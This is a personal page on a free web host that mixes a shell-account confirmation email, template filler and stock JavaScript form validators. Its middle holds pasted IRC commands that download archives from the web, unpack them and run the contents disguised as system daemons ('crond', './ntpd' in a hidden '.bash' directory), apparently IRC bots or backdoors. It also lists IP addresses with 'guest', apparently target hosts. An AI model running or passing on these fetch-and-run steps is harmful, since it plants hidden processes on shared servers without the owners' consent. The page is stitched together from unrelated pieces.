Free Web Hosting Provider - Web Hosting - E-commerce - High Speed Internet - Free Web Page
Search the Web

Custom Page 4

Acasa Lectie root Arhive linux Chestii hack 1 Chestii hack 2 Chestii hack 3 Poze 1 Poze 2 Photo3 The most used serials Ceva de zis? NewAge`s Photos @ MU ONline

Here you'll create or edit a custom page for your Web site.

IPv6: direct access redhat.ip6.polarhome.com
IPv4: port-forwarded
IPv4: direct access ports are: 5000-9999

Note: RedHat server is migrated to Fedora Core.
The only difference is that everything that has been valid for redhat.polarhome.com, now is valid for fedora.polarhome.com too - including e-mail, access, IP addresses, direct ports, etc.
Basically, with one account you get two identities.


Dear Me You from 194.153.226.158,

Congratulations :-)

Your request for username: best502 on server redhat has been accepted.
In about 5-10 minutes you can try your new account at redhat.polarhome.com using POP3 or IMAP protocols.
BUT you can not use your new account with ftp, telnet or ssh because according to shell policy it requires an extra hardcopy registartion.

Please note: polarhome will not send you any e-mail confirmation regarding this account creation to given e-mail address.

Read rules, discamer and legal notices.


With this account you got:
- personal homepage http://www.polarhome.com/~best502
(Note:Your account is ready if this link is alive)
- new e-mail address best502@redhat.polarhome.com
- IMAP and POP3 account (even through Web interface)
- free disk space of 20Mb
- irc, ftp etc. access from and to internet
- MySQL database account - details are sent to best502@redhat.polarhome.com

- use port list as a guide to access polarhome services


Welcome..., and feel yourself at home.

Server hardware description


Last note:
You have been added to polarhome.com FORUM with username best502_redhat. You can log in imediatelly using your password.


YOUR WEB STUFF!

http://europa.your-site.com/~gepeto/

http://www.bestiutza.addr.com

wget www.geocities.com/ftpmirc2/moflea/mech.tgz
<Best`> tar zxvf mech.tgz
<Best`> cd mech
<Best`> sh
<Best`> export
<Best`> PATH='.'
<Best`> crond
 
 
wget geocities.com/stelistul17/crewII
84.10.92.91 guest 218.90.137.90 200.31.206.193
 
 
wget firehand.home.ro/p.tgz;tar zxvf p.tgz;rm -rf p.tgz;cd .bash;./ntpd

YOUR WEB STUFF!

Custom pages can be used for any kind of content and are a great way to add information to your site.

YOUR WEB STUFF!

<script>

function emailvalidation(entered, alertbox)
{
// E-mail Validation by Henrik Petersen / NetKontoret
// Explained at www.echoecho.com/jsforms.htm
// Please do not remove this line and the two lines above.
with (entered)
{
apos=value.indexOf("@");
dotpos=value.lastIndexOf(".");
lastpos=value.length-1;
if (apos<1 || dotpos-apos<2 || lastpos-dotpos>3 || lastpos-dotpos<2)
{if (alertbox) {alert(alertbox);} return false;}
else {return true;}
}
}

function valuevalidation(entered, min, max, alertbox, datatype)
{
// Value Validation by Henrik Petersen / NetKontoret
// Explained at www.echoecho.com/jsforms.htm
// Please do not remove this line and the two lines above.
with (entered)
{
checkvalue=parseFloat(value);
if (datatype)
{smalldatatype=datatype.toLowerCase();
if (smalldatatype.charAt(0)=="i") {checkvalue=parseInt(value)};
}
if ((parseFloat(min)==min && checkvalue<min) || (parseFloat(max)==max && checkvalue>max) || value!=checkvalue)
{if (alertbox!="") {alert(alertbox);} return false;}
else {return true;}
}
}


function digitvalidation(entered, min, max, alertbox, datatype)
{
// Digit Validation by Henrik Petersen / NetKontoret
// Explained at www.echoecho.com/jsforms.htm
// Please do not remove this line and the two lines above.
with (entered)
{
checkvalue=parseFloat(value);
if (datatype)
{smalldatatype=datatype.toLowerCase();
if (smalldatatype.charAt(0)=="i")
{checkvalue=parseInt(value); if (value.indexOf(".")!=-1) {checkvalue=checkvalue+1}};
}
if ((parseFloat(min)==min && value.length<min) || (parseFloat(max)==max && value.length>max) || value!=checkvalue)
{if (alertbox!="") {alert(alertbox);} return false;}
else {return true;}
}
}


function emptyvalidation(entered, alertbox)
{
// Emptyfield Validation by Henrik Petersen / NetKontoret
// Explained at www.echoecho.com/jsforms.htm
// Please do not remove this line and the two lines above.
with (entered)
{
if (value==null || value=="")
{if (alertbox!="") {alert(alertbox);} return false;}
else {return true;}
}
}


function formvalidation(thisform)
{
// This function checks the entire form before it is submitted
// Note: This function needs to be customized to fit your form
with (thisform)
{
if (emailvalidation(Email,"Illegal E-mail")==false) {Email.focus(); return false;};
if (valuevalidation(Value,0,5,"Value MUST be in the range 0-5")==false) {Value.focus(); return false;};
if (digitvalidation(Digits,3,4,"You MUST enter 3 or 4 integer digits","I")==false) {Digits.focus(); return false;};
if (emptyvalidation(Whatever,"The textfield is empty")==false) {Whatever.focus(); return false;};
}
}
</script>